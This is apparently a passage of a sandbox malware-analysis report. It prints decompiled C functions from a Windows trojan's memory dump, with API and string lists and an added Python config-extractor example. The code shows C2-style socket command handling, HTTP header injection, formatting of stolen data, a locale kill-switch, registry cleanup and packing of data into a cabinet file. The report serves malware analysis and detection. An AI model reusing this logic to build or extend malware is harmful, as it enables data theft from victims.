    					E0041223B(_t126, 0x80000002, _t130);
    				}
    				_t71 = _a20;
    				_t128 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
    				_v16 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
    				if(( *(_t71 + 2) & 0x00000080) == 0) {
    					L14:
    					_v8 = _v8 & 0x00000000;
    					_v12 = _v12 | 0xffffffff;
    					_t74 = E00414398( &_v8, _t129, __eflags, _a4, _a8 + 1, 0x80000000);
    					_a8 = _t74;
    					__eflags = _t74;
    					if(_t74 == 0) {
    						L35:
    						E0040F0C0(_a8);
    						L36:
    						return _v12;
    					}
    					__eflags = _v8 - 0x12;
    					if(_v8 < 0x12) {
    						goto L35;
    					}
    					_t134 =  *(_a16 + 0x430);
    					_t78 = E0040CBFA( *(_a16 + 0x430));
    					__eflags = _t78 - 0xffffffff;
    					if(_t78 != 0xffffffff) {
    						L18:
    						_t131 = _t78 * 0x30 +  *0x417024;
    						_t30 = _t131 + 0x24; // -4288512
    						_t135 = _t30;
    						_t84 = E0040F053(( *(_t131 + 0x28) + 1) * 0x18, _t135);
    						__eflags = _t84;
    						if(_t84 == 0) {
    							goto L35;
    						}
    						_t85 =  *(_t131 + 0x28);
    						_t123 = _t85 * 0x18 +  *_t135;
    						_t136 = _a20;
    						 *(_t131 + 0x28) = _t85 + 1;
    						_t123[1] = _a8;
    						_t123[2] = _v8;
    						_t89 =  *(_t136 + 0xc) & 0x0000ffff;
    						__eflags = _t89;
    						if(_t89 != 0) {
    							_t100 = (_t89 & 0x0000ffff) + _t136;
    							__eflags = (_t89 & 0x0000ffff) + _t136 | 0xffffffff;
    							_t123[5] = E0040F244((_t89 & 0x0000ffff) + _t136 | 0xffffffff, _t100);
    						}
    						_t90 =  *(_t136 + 0xa) & 0x0000ffff;
    						__eflags = _t90;
    						if(_t90 != 0) {
    							_t97 = (_t90 & 0x0000ffff) + _t136;
    							__eflags = (_t90 & 0x0000ffff) + _t136 | 0xffffffff;
    							_t90 = E0040F244((_t90 & 0x0000ffff) + _t136 | 0xffffffff, _t97);
    							_t123[3] = _t90;
    						}
    						__eflags = _t123[3];
    						if(_t123[3] != 0) {
    							L25:
    							__eflags = _t90 | 0xffffffff;
    							_t123[4] = E0040F244(_t90 | 0xffffffff, _v16);
    							goto L26;
    						} else {
    							__eflags =  *(_t136 + 2) & 0x00000080;
    							if(( *(_t136 + 2) & 0x00000080) == 0) {
    								L26:
    								__eflags =  *(_t136 + 2) & 0x00000010;
    								if(( *(_t136 + 2) & 0x00000010) != 0) {
    									 *_t123 =  *_t123 | 0x00000001;
    									__eflags =  *_t123;
    								}
    								__eflags =  *(_t136 + 2) & 0x00000020;
    								if(( *(_t136 + 2) & 0x00000020) != 0) {
    									 *_t123 =  *_t123 | 0x00000002;
    									__eflags =  *_t123;
    								}
    								__eflags =  *(_t136 + 2) & 0x00000040;
    								if(( *(_t136 + 2) & 0x00000040) != 0) {
    									 *_t123 =  *_t123 | 0x00000004;
    									__eflags =  *_t123;
    								}
    								__eflags =  *(_t136 + 2) & 0x00000080;
    								if(( *(_t136 + 2) & 0x00000080) != 0) {
    									 *_t123 =  *_t123 | 0x00000008;
    									__eflags =  *_t123;
    								}
    								_t93 =  *0x416c34; // 0x25df5a8
    								_t60 = _t93 + 0x154; // 0x2563579
    								HttpAddRequestHeadersA( *(_a16 + 0x430),  *_t60, 0xffffffff, 0x80000000);
    								_v12 = _v12 & 0x00000000;
    								goto L36;
    							}
    							goto L25;
    						}
    					}
    					_t78 = E0040CC23(1, _t134);
    					__eflags = _t78 - 0xffffffff;
    					if(_t78 == 0xffffffff) {
    						goto L35;
    					}
    					goto L18;
    				} else {
    					E004100F6( &_v48, _t128, E0040F521(_t128));
    					_v8 = _v8 & 0x00000000;
    					_t108 = E00408471( &_v8, _t128, 0,  &_v48);
    					_t137 = _v8;
    					if(_t108 != 0x10) {
    						L13:
    						E0040F0C0(_t137);
    						goto L14;
    					}
    					GetSystemTime( &_v32);
    					if( *((intOrPtr*)(_t137 + 6)) != _v32.wDay ||  *((intOrPtr*)(_t137 + 2)) != _v32.wMonth) {
    						goto L13;
    					} else {
    						return E0040F0C0(_t137) | 0xffffffff;
    					}
    				}
    			}

    APIs
    • HttpAddRequestHeadersA.WININET(?,02563579,000000FF,80000000), ref: 0040D8E0
    • GetSystemTime.KERNEL32(?,00000000,?,?,?,00000000,80000002,EnabledV8,80000002,Enabled,80000001,EnabledV8,80000001,Enabled), ref: 0040D78F
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FreeHeadersHeapHttpRequestSystemTime
    • String ID: Enabled$EnabledV8
    • API String ID: 2915018814-2402240967
    • Opcode ID: c67b571225c63d4fea0539e2653570520cf32579c1d6bae6ba6b9fed7d931862
    • Instruction ID: 179babfc5476f36df04242e9d0cf11d5560011b83c23579df7fb9967512e48f3
    • Opcode Fuzzy Hash: c67b571225c63d4fea0539e2653570520cf32579c1d6bae6ba6b9fed7d931862
    • Instruction Fuzzy Hash: 8B51C571800205AADB24EFA5CD85BAB7BF8AF05324F04817AF860F72D1D738D949C768
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E00409BD7(intOrPtr _a4) {
    				char _v76;
    				char _v80;
    				char _v84;
    				intOrPtr _v88;
    				void* _v92;
    				char _v96;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				char _v124;
    				intOrPtr _v140;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t52;
    				intOrPtr _t55;
    				void* _t68;
    				void* _t81;
    				intOrPtr* _t84;
    				intOrPtr _t90;
    				intOrPtr* _t93;
    
    				_t90 = _a4;
    				_push(0x2710);
    				_t81 = 4;
    				_push(_t81);
    				_push( &_v84);
    				if(E004104CA(_t90) != _t81 || E004104CA(_t90,  &_v96, _t81, 0x2710) != _t81) {
    					L29:
    					return E004108F5(_a4);
    				} else {
    					_t51 = _v96;
    					if(_v96 > 0xffff) {
    						goto L29;
    					}
    					_t52 = E0040F0A8(_t51);
    					_v88 = _t52;
    					if(_t52 == 0) {
    						goto L29;
    					}
    					if(E004104CA(_t90, _t52, _v96, 0x2710) != _v108) {
    						L28:
    						E0040F0C0(_v88);
    						goto L29;
    					}
    					if(_v84 == 0xa) {
    						_t55 =  *0x416c34; // 0x25df5a8
    						_t14 = _t55 + 0x70; // 0x25dfc30
    						_v80 = 0x32;
    						_v92 = E0040F21C( *_t14);
    						if(_v96 >= _t81) {
    							_t87 = _v88;
    							E0040F0FC( &_v80, _v88, _t81);
    							_t75 = _v108;
    							if(_v108 > _t81) {
    								_v96 = E0040F4DC(_t75 + 0xfffffffc, _t87 + 4);
    							}
    						}
    						if(_v92 == 0) {
    							goto L28;
    						} else {
    							_t93 = E0040970D(_v92, _v80, 0);
    							_v92 = _t93;
    							if(_t93 == 0) {
    								L27:
    								E0040F0C0(_v92);
    								goto L28;
    							}
    							_push(1);
    							_push( &_v76);
    							_push(_t93);
    							if( *((intOrPtr*)( *_t93 + 0x30))() != 0) {
    								L26:
    								 *((intOrPtr*)( *_t93 + 8))(_t93);
    								goto L27;
    							}
    							_v76 = 0x1000;
    							 *0x416d8c(_a4,  &_v80, 8, 0);
    							_t84 = E0040F0A8(_v92);
    							if(_t84 == 0) {
    								goto L26;
    							}
    							while(1) {
    								_t68 =  *((intOrPtr*)( *_t93 + 0xc))(_t93, _t84, _v92,  &_v124);
    								if(_t68 != 0 || _v140 == _t68) {
    									break;
    								}
    								_push(_t68);
    								_push(_v140);
    								_push(_t84);
    								_push(_a4);
    								if( *0x416d8c() == 0xffffffff) {
    									break;
    								}
    								if(E004104CA(_a4, _t84, 4, 0x2710) != 4 ||  *_t84 != _v124) {
    									_t93 = _v140;
    									break;
    								} else {
    									_t93 = _v140;
    									continue;
    								}
    							}
    							E0040F0C0(_t84);
    							goto L26;
    						}
    					}
    					if(_v84 == 0x14 && _v96 >= _t81) {
    						_push(0);
    						_push(_v96);
    						_push(_v88);
    						_push(_t90);
    						if( *0x416d8c() == _v112) {
    							E0040C046();
    						}
    					}
    					goto L28;
    				}
    			}

    APIs
      • Part of subcall function 004104CA: select.WS2_32(00000000,?,00000000,00000000,0000000C), ref: 0041051A
      • Part of subcall function 004104CA: recv.WS2_32(0000000C,00000000,?,00000000), ref: 00410532
    • send.WS2_32(?,00002710,00002710,00000000), ref: 00409C72
      • Part of subcall function 0040C046: GetCurrentThread.KERNEL32 ref: 0040C049
      • Part of subcall function 0040C046: SetThreadPriority.KERNEL32(00000000,?,00408052), ref: 0040C050
      • Part of subcall function 0040C046: SHDeleteKeyA.SHLWAPI(80000001,025DF739,?,00408052), ref: 0040C063
      • Part of subcall function 0040C046: SHDeleteKeyA.SHLWAPI(80000002,025DF739,?,00408052), ref: 0040C077
      • Part of subcall function 0040C046: SHDeleteKeyA.SHLWAPI(80000002,025DF979,?,00408052), ref: 0040C086
      • Part of subcall function 0040C046: Sleep.KERNEL32(000003E8,?,00408052), ref: 0040C091
    • send.WS2_32 ref: 00409D1F
    • send.WS2_32(?,00000000,00002710,00000000), ref: 00409D5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Deletesend$Thread$CurrentPrioritySleeprecvselect
    • String ID: 2
    • API String ID: 850893207-450215437
    • Opcode ID: 46fe44349554b123d1742cfd3457736fce94dc09eca5e6b2f2c4ccb72573c980
    • Instruction ID: 34227afae8e1390ff33c29a62b652d35070be1b20eb703bc4365b587749610a1
    • Opcode Fuzzy Hash: 46fe44349554b123d1742cfd3457736fce94dc09eca5e6b2f2c4ccb72573c980
    • Instruction Fuzzy Hash: 3D519C72148301AFD710EF61C88496FB7E8AF84314F14893FF554A2292D779DD49CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040A4AE(intOrPtr __ecx) {
    				char* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t29;
    				void* _t32;
    				intOrPtr* _t33;
    				intOrPtr* _t36;
    				void* _t37;
    				intOrPtr _t43;
    				intOrPtr _t44;
    				intOrPtr _t47;
    				char _t50;
    				char* _t55;
    				intOrPtr _t57;
    				char* _t59;
    				signed char _t61;
    				char* _t62;
    				signed char _t63;
    				intOrPtr* _t66;
    				intOrPtr _t71;
    				void* _t72;
    
    				_t58 = __ecx;
    				 *0x416a68 =  *0x416a68 & 0x00000000;
    				 *0x416a14 =  *0x416a14 & 0x00000000;
    				 *0x416fe4(0x416a6c);
    				if(WaitForSingleObject( *0x416a8c, 0xea60) == 0x102) {
    					do {
    						_t29 = E00408471( &_v16, _t58, 0, "!213KJhndkmnihjd");
    						_t62 = _v16;
    						if(_t62 != 0 && _t29 > 5) {
    							_t58 = _t29;
    							_t32 = E0040F732(_t62, _t29);
    							_t78 = _t32;
    							if(_t32 != 0) {
    								_v8 = _t62;
    								do {
    									_t55 = _v8;
    									__eflags =  *_t55;
    									_t59 = _t55;
    									if( *_t55 != 0) {
    										while(1) {
    											_t50 =  *_t59;
    											_t59 = _t59 + 1;
    											__eflags = _t50 - 0x7c;
    											if(_t50 == 0x7c) {
    												goto L10;
    											}
    											__eflags =  *_t59;
    											if( *_t59 != 0) {
    												continue;
    											}
    											goto L10;
    										}
    									}
    									L10:
    									__eflags =  *_t59;
    									if( *_t59 != 0) {
    										_v20 = E004101FE(_t59, E0040F521(_t59));
    										_t36 = E0040A07D(_t35);
    										__eflags = _t36;
    										if(_t36 == 0) {
    											_t37 = 0x10;
    											_t66 = E0040F0A8(_t37);
    											__eflags = _t66;
    											if(_t66 != 0) {
    												_v12 = E0040F521(_t55);
    												_t71 = E0040F244(_t39, _t55);
    												_t61 = 0;
    												__eflags = _t71;
    												if(_t71 == 0) {
    													L24:
    													E0040F0C0(_t66);
    												} else {
    													_t63 = 0;
    													__eflags = _v12;
    													if(_v12 <= 0) {
    														L23:
    														E0040F0C0(_t71);
    														goto L24;
    													} else {
    														do {
    															__eflags =  *((char*)(_t61 + _t71)) - 0x7c;
    															if( *((char*)(_t61 + _t71)) != 0x7c) {
    																goto L18;
    															} else {
    																_t10 = _t71 + 1; // 0x1
    																_t43 = _t61 + _t10;
    																 *((char*)(_t61 + _t71)) = 0;
    																 *((intOrPtr*)(_t72 + (_t63 & 0x000000ff) * 4 - 0x18)) = _t43;
    																__eflags = _t43;
    																if(_t43 == 0) {
    																	break;
    																} else {
    																	_t63 = _t63 + 1;
    																	__eflags = _t63 - 2;
    																	if(_t63 == 2) {
    																		L20:
    																		_t57 = _v20;
    																		_t44 = E0040A0BD(_t57);
    																		__eflags = _t44;
    																		if(_t44 == 0) {
    																			goto L23;
    																		} else {
    																			 *((intOrPtr*)(_t66 + 4)) = _v28;
    																			 *_t66 = _t71;
    																			 *((intOrPtr*)(_t66 + 8)) = _v24;
    																			 *((intOrPtr*)(_t66 + 0xc)) = _t57;
    																			 *0x416a88 =  *0x416a88 + 1;
    																			_t47 = E0040C14A(_t61, E0040A47B, _t66);
    																			__eflags = _t47;
    																			if(_t47 <= 0) {
    																				 *0x416a88 =  *0x416a88 - 1;
    																				__eflags =  *0x416a88;
    																				E0040A15B(_t57);
    																				goto L23;
    																			}
    																		}
    																	} else {
    																		goto L18;
    																	}
    																}
    															}
    															goto L25;
    															L18:
    															_t61 = _t61 + 1;
    															__eflags = _t61 - _v12;
    														} while (_t61 < _v12);
    														__eflags = _t63 - 2;
    														if(_t63 != 2) {
    															goto L23;
    														} else {
    															goto L20;
    														}
    													}
    												}
    											}
    										}
    									}
    									L25:
    									_t58 = _v8;
    									_t33 = E0040F750(_v8, 1);
    									_v8 = _t33;
    									__eflags = _t33;
    								} while (_t33 != 0);
    							} else {
    								E00408558(_t78, 0, "!213KJhndkmnihjd");
    							}
    							E0040F0C0(_v16);
    						}
    					} while (WaitForSingleObject( *0x416a8c, 0xea60) == 0x102);
    				}
    				 *0x416a88 =  *0x416a88 - 1;
    				return 0;
    			}

    APIs
    • RtlInitializeCriticalSection.NTDLL(00416A6C), ref: 0040A4C7
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 0040A4D8
    • WaitForSingleObject.KERNEL32(0000EA60,00000000,!213KJhndkmnihjd), ref: 0040A639
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ObjectSingleWait$CriticalInitializeSection
    • String ID: !213KJhndkmnihjd
    • API String ID: 3229800866-75480694
    • Opcode ID: 8674efd75facac57a70c1ad001bf632fd2bbcc6a6e5092067f9e9e204be7a637
    • Instruction ID: af143862fd356ee8df9386d8ba87e7e0d9ce9b4cde6799e4e5da0b45702a10ee
    • Opcode Fuzzy Hash: 8674efd75facac57a70c1ad001bf632fd2bbcc6a6e5092067f9e9e204be7a637
    • Instruction Fuzzy Hash: BB411530900300AADB20AF65DC857AE7BB5AF46308F15843FE441B72D2D77E8995875A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E00404F49(void* __ecx, void* __eflags, intOrPtr _a4) {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v48;
    				char _v52;
    				char _v2104;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t47;
    				intOrPtr _t53;
    				intOrPtr _t54;
    				intOrPtr* _t69;
    				signed int _t74;
    				intOrPtr _t77;
    				signed int _t83;
    				signed int _t85;
    				void* _t86;
    
    				_v12 = 0;
    				if(E0040FE88(0, __ecx,  &_v52, _a4) != 0) {
    					_t83 =  &_v24;
    					_v24 = 0;
    					_t47 = E0040B013(_v48, _v52, _t83);
    					_v32 = _t47;
    					if(_t47 != 0) {
    						asm("sbb esi, esi");
    						_t74 = _v24 - 9;
    						_t85 =  !_t83 & _t74;
    						_v16 = 0;
    						_v20 = 0;
    						if(_t85 > 0) {
    							_t13 = _t47 + 4; // 0x4
    							_t69 = _t13;
    							while(1) {
    								_t77 =  *((intOrPtr*)(_t69 - 4));
    								_v36 = _t77;
    								if(_t77 == 0) {
    									break;
    								}
    								_t53 =  *_t69;
    								_v28 = _t53;
    								if(_t53 == 0) {
    									break;
    								} else {
    									_t54 =  *((intOrPtr*)(_t69 + 4));
    									_a4 = _t54;
    									if(_t54 == 0) {
    										break;
    									} else {
    										E0040F27D(_t77);
    										E0040F27D(_v28);
    										_t79 = _a4;
    										E0040F27D(_a4);
    										if(_v16 == 0) {
    											L9:
    											wnsprintfA( &_v2104, 0x7ff, "\nPath: %s\n", _a4);
    											_t86 = _t86 + 0x10;
    											if(E0040AFBA( &_v12,  &_v2104) == 0) {
    												goto L14;
    											} else {
    												goto L10;
    											}
    										} else {
    											_t74 = _t74 | 0xffffffff;
    											if(E0040F547(_t74, _t79, _t74, _v16) == 0) {
    												L10:
    												wnsprintfA( &_v2104, 0x7ff, "%s=%s\n", _v36,  *_t69);
    												_t86 = _t86 + 0x14;
    												if(E0040AFBA( &_v12,  &_v2104) == 0) {
    													L14:
    													_v12 = _v12 & 0x00000000;
    												} else {
    													_v20 = _v20 + 9;
    													_t69 = _t69 + 0x24;
    													_v16 = _a4;
    													if(_v20 < _t85) {
    														continue;
    													} else {
    													}
    												}
    											} else {
    												goto L9;
    											}
    										}
    									}
    								}
    								goto L15;
    							}
    							E0040F0C0(_v12);
    							goto L14;
    						}
    						L15:
    						E0040F0DC(_v24, _v32);
    					}
    					E0040FF41( &_v52);
    				}
    				return _v12;
    			}

    APIs
      • Part of subcall function 0040FE88: CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,0041AFD6,?,?,?,0040438B,00416538,025DF908,00000006), ref: 0040FEB4
      • Part of subcall function 0040FE88: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FEC7
    • wnsprintfA.SHLWAPI ref: 00405014
    • wnsprintfA.SHLWAPI ref: 00405046
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Filewnsprintf$CreateSize
    • String ID: Path: %s$%s=%s
    • API String ID: 2143265763-3969205073
    • Opcode ID: 4bbbef1737ddc6e17752e3d47fa815d7a17ea37a3881e51d166b889865fad037
    • Instruction ID: 0bde1fe9cf7bf4c74afc59f25207c8e6b93a82bbb5edf45c9804380ee5412860
    • Opcode Fuzzy Hash: 4bbbef1737ddc6e17752e3d47fa815d7a17ea37a3881e51d166b889865fad037
    • Instruction Fuzzy Hash: 5A415E71D0061AABCF10EF95C840AEEBBB5FF44344F148176E814B7295D739AA45CF94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E0040A7DD(char _a4) {
    				char _v9;
    				char _v16;
    				char _v416;
    				void* __ebx;
    				intOrPtr _t19;
    				intOrPtr _t20;
    				void* _t23;
    				char _t28;
    				signed char _t34;
    				void* _t40;
    				void* _t45;
    				void* _t48;
    
    				_t19 =  *0x416c64; // 0x41b000
    				_t1 = _t19 + 0x26; // 0x10000020
    				_t2 = _t19 + 0x24; // 0x20001c
    				_t40 = ( *_t1 & 0x000000ff) + _t19;
    				_t3 = _t19 + 0x25; // 0x2000
    				_t20 =  *_t3;
    				_t5 = _t40 + 0x12c; // 0x200148
    				_t45 = ( *_t2 & 0x000000ff) + _t5;
    				_t41 = 0;
    				_v9 = 0;
    				if(_t20 > 0) {
    					while(1) {
    						_t48 =  *((intOrPtr*)(_t45 + (_t41 & 0x000000ff) * 2)) -  *0x416c50; // 0x409  (16-bit table entry vs. the value cached at 0x416c50; 0x0409 is the en-US LANGID, so this reads as a locale list check)
    						if(_t48 == 0) {
    							break;
    						}
    						_t41 = _t41 + 1;
    						if(_t41 < _t20) {
    							continue;
    						} else {
    						}
    						goto L5;
    					}
    					_v9 = 1;
    				}
    				L5:
    				L004042E5();
    				 *0x416fe4(0x416740); // RtlInitializeCriticalSection, ref 0040A832
    				 *0x416a88 =  *0x416a88 + 1;
    				_t23 = E0040C14A(_t41, E004046B3, 0x416796);
    				_t50 = _v9;
    				if(_v9 == 0) {
    					E0040A6A0();
    					 *0x416db4(0x202,  &_v416); // WSAStartup(MAKEWORD(2,2), &wsaData), ref 0040A868
    					 *0x416a88 =  *0x416a88 + 1;
    					E0040C14A(_t41, E00409E00, 0);
    					_t28 =  *0x416a8c; // 0x0
    					_v16 = _t28;
    					E004150D4(0, _t50, _a4,  &_v16);
    					 *0x416a88 =  *0x416a88 + 1;
    					E0040C14A(_t41, E0040A4AE, 0x416796);
    					 *0x416a88 =  *0x416a88 + 1;
    					 *0x416fe4(0x416758); // RtlInitializeCriticalSection, ref 0040A8AF
    					 *0x416a88 =  *0x416a88 + 1;
    					 *0x416774 = 0;
    					 *0x416770 = 0;
    					_a4 = 0;
    					_t34 = E00408471( &_a4, _t41, 0, "PopOpO03-3331111");
    					_t51 = _t34;
    					if(_t34 != 0) {
    						_t41 = _t34;
    						E00404DB5(_a4, _t34, _t51);
    						E0040F0C0(_a4);
    					}
    					_t23 = E0040C14A(_t41, E00404CEE, 0x416a88);
    					if(_t23 != 0) {
    						 *0x416a88 =  *0x416a88 - 1;
    						return _t23;
    					}
    				}
    				return _t23;
    			}

    Instruction address column: 0x0040a7e6 - 0x0040a90a

    APIs
    • RtlInitializeCriticalSection.NTDLL(00416740), ref: 0040A832
    • WSAStartup.WS2_32(00000202,?), ref: 0040A868
    • RtlInitializeCriticalSection.NTDLL(00416758), ref: 0040A8AF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$Startup
    • String ID: PopOpO03-3331111
    • API String ID: 100036477-962168976
    • Opcode ID: 31f6f1e59355d3fe6bd820a9a6b5c5e9f7b8390bb57b7b5329f03a6ea53675a0
    • Instruction ID: 329d635010767d0fd457d61d6b01bed5a64a8ea320644c308da13513533a6568
    • Opcode Fuzzy Hash: 31f6f1e59355d3fe6bd820a9a6b5c5e9f7b8390bb57b7b5329f03a6ea53675a0
    • Instruction Fuzzy Hash: 5631D771640214ABCB016FA5EC86EE93BB9EF06345703C07BB945761D2DA78C491CBAD
    Uniqueness

    Uniqueness Score: -1.00%
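
Worked example (added here; not code from the report or from the sample): a Python re-implementation of the table walk at the top of E0040A7DD, for anyone writing a config extractor for this family. It takes the decompiled offsets literally: with blob the buffer whose address sits at 0x416c64, the entry count is the byte at blob+0x25 (the loop index is masked to 8 bits, so a byte width is assumed), the table starts at blob + blob[0x26] + 0x12c + blob[0x24], entries are 16-bit (the stride of 2), and the value cached at 0x416c50 (0x0409 in the dump, the en-US LANGID) is assumed to be the system LANGID. When an entry matches, _v9 becomes 1 and the rest of the initialisation (critical sections, WSAStartup, the threads started through E0040C14A) is skipped. The header bytes quoted in the listing (1c 00 20 00 at +0x24) give a count of 0 for this dump, so in this run the gate never fires; the constructed blob below patches the count byte to exercise both paths.

```python
"""Reconstruction of the LANGID table walk in E0040A7DD (added example).

Offsets are taken from the decompiled listing; the field widths (count byte,
u16 entries) and the meaning of the value at 0x416c50 are assumptions."""
import struct

TABLE_FIXED_OFFSET = 0x12C          # the `_t40 + 0x12c` term in the listing


def langid_table(blob: bytes) -> list:
    """Return the u16 entries the loop at 0040A7FC..0040A81A compares.

    count = blob[0x25]  (assumed 1 byte: the loop index is masked with 0xff)
    table = blob + blob[0x26] + 0x12c + blob[0x24]
    """
    if len(blob) < 0x27:
        raise ValueError("blob shorter than the header fields at +0x24..+0x26")
    count = blob[0x25]
    table = blob[0x26] + TABLE_FIXED_OFFSET + blob[0x24]
    if table + 2 * count > len(blob):
        raise ValueError("table runs past the end of the blob")
    return list(struct.unpack_from("<%dH" % count, blob, table))


def init_is_skipped(blob: bytes, system_langid: int) -> bool:
    """True when E0040A7DD would set _v9 = 1 and skip its main setup.

    That happens iff system_langid (the value cached at 0x416c50, 0x0409 in
    the dump) equals one of the table entries. An empty table never matches.
    """
    return system_langid in langid_table(blob)


def build_blob(langids, off24: int = 0x1C, off26: int = 0x20) -> bytes:
    """Constructed test blob. The +0x24/+0x26 bytes mirror the dump
    (1c 00 20 00); the count byte at +0x25 is set to len(langids)."""
    if len(langids) > 0xFF:
        raise ValueError("count is a single byte")
    table = off26 + TABLE_FIXED_OFFSET + off24
    buf = bytearray(table + 2 * len(langids))
    buf[0x24] = off24
    buf[0x25] = len(langids)
    buf[0x26] = off26
    struct.pack_into("<%dH" % len(langids), buf, table, *langids)
    return bytes(buf)


if __name__ == "__main__":
    dump_like = build_blob([])                      # count 0, as in this dump
    print("gate fires with empty table:", init_is_skipped(dump_like, 0x0409))
    blocked = build_blob([0x0419, 0x0422, 0x0409])  # ru-RU, uk-UA, en-US
    print("gate fires for en-US:", init_is_skipped(blocked, 0x0409))
```

Call init_is_skipped(blob, langid) with the raw buffer and the LANGID the sample would read on the host; build_blob exists only to fabricate inputs for the demonstration.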

    C-Code - Quality: 86%
    			E00411B52(char _a4) {
    				void* _t26;
    				intOrPtr _t28;
    				WCHAR* _t34;
    				intOrPtr* _t36;
    
    				_t34 = 0;
    				if(E00411A6B() != 0) {
    					_t36 = E0040F0A8(0x950);
    					if(_t36 == 0) {
    						L7:
    						E00411B31();
    					} else {
    						_t1 =  &_a4; // 0x415534
    						_t2 = _t36 + 0x53e; // 0x53e
    						if(PathCombineW(_t2,  *_t1, 0) == 0) {
    							L6:
    							E0040F0C0(_t36);
    							goto L7;
    						} else {
    							_t3 = _t36 + 0x746; // 0x746
    							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t22 > 0x00000000) == 0) {
    								goto L6;
    							} else {
    								 *((intOrPtr*)(_t36 + 0x14)) = 0x7fffffff; // CCAB.cbFolderThresh (a CCAB at +0x10 is inferred; every field below lands on its documented offset)
    								_t7 = _t36 + 0x10; // 0x10
    								 *_t7 = 0x7fffffff; // CCAB.cb: no size limit on the cabinet
    								 *((intOrPtr*)(_t36 + 0x24)) = 1; // CCAB.iCab
    								 *((intOrPtr*)(_t36 + 0x28)) = 1; // CCAB.iDisk
    								_t10 = _t36 + 0x132; // 0x132
    								E0040F0FC(_t10, "cabinet.dll", 0xc); // CCAB.szCab: the output cabinet is named after the DLL
    								_t11 = _t36 + 0x232; // 0x232
    								_t26 = E0040F0FC(_t11, "?O", 2); // CCAB.szCabPath (2-byte copy; the decompiler renders the bytes as "?O")
    								_t12 = _t36 + 4; // 0x4
    								_t28 =  *0x4176a4(_t12, E004119D7, E0041172B, E0041173E, E00411751, E0041183D, E00411874, E004118BA, E004118DB, E00411925, E0041195F, _t26, _t36); // FCICreate, resolved in 00411A6B: PERF at +4, ten callbacks, pccab, pv (13 arguments, matching FCICreate's signature)
    								 *_t36 = _t28;
    								if(_t28 == 0) {
    									goto L6;
    								} else {
    									_t34 = _t36;
    								}
    							}
    						}
    					}
    				}
    				return _t34;
    			}

    Instruction address column: 0x00411b53 - 0x00411c46

    APIs
      • Part of subcall function 00411A6B: LoadLibraryA.KERNEL32(cabinet.dll,00000000,00411B5A,00000000,00411E2F,00405611,00000000,00000000,?,00415534,?,00405611,?), ref: 00411A7F
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411A98
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(FCIAddFile), ref: 00411AAE
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411AC4
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(FCIDestroy), ref: 00411ADA
      • Part of subcall function 00411A6B: HeapCreate.KERNEL32(00000000,00080000,00000000,?,00415534,?,00405611,?), ref: 00411B08
      • Part of subcall function 00411A6B: FreeLibrary.KERNEL32(?,00415534,?,00405611,?), ref: 00411B1D
    • PathCombineW.SHLWAPI(0000053E,4UA,00000000,00000000,00000000,00411E2F,00405611,00000000,00000000,?,00415534,?,00405611,?), ref: 00411B83
    • GetTempPathW.KERNEL32(00000103,00000746,?,00415534,?,00405611,?), ref: 00411B9D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$LibraryPath$CombineCreateFreeHeapLoadTemp
    • String ID: 4UA$cabinet.dll
    • API String ID: 2929573254-238230206
    • Opcode ID: 8637e56342af31a58a1afeb433268d77599254d55b9a76985ca6ff0e09ef27a7
    • Instruction ID: a4bc9d7652f6a033511903e8c4902c2ca4c763a4a97b570fe50f10f73e0c476a
    • Opcode Fuzzy Hash: 8637e56342af31a58a1afeb433268d77599254d55b9a76985ca6ff0e09ef27a7
    • Instruction Fuzzy Hash: 51112470390B01ABD634AF219D06FEB37A89F45B00B10453FB352A66E1EA7CD585C76C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E004055B9(intOrPtr _a4) {
    				short _v528;
    				void* __edi;
    				void* _t8;
    				void* _t15;
    
    				_t8 =  *0x416c44(0,  &_v528, 0x1a, 0); // SHGetSpecialFolderPathW(NULL, path, CSIDL_APPDATA = 0x1a, FALSE), ref 004055D1
    				if(_t8 != 0) {
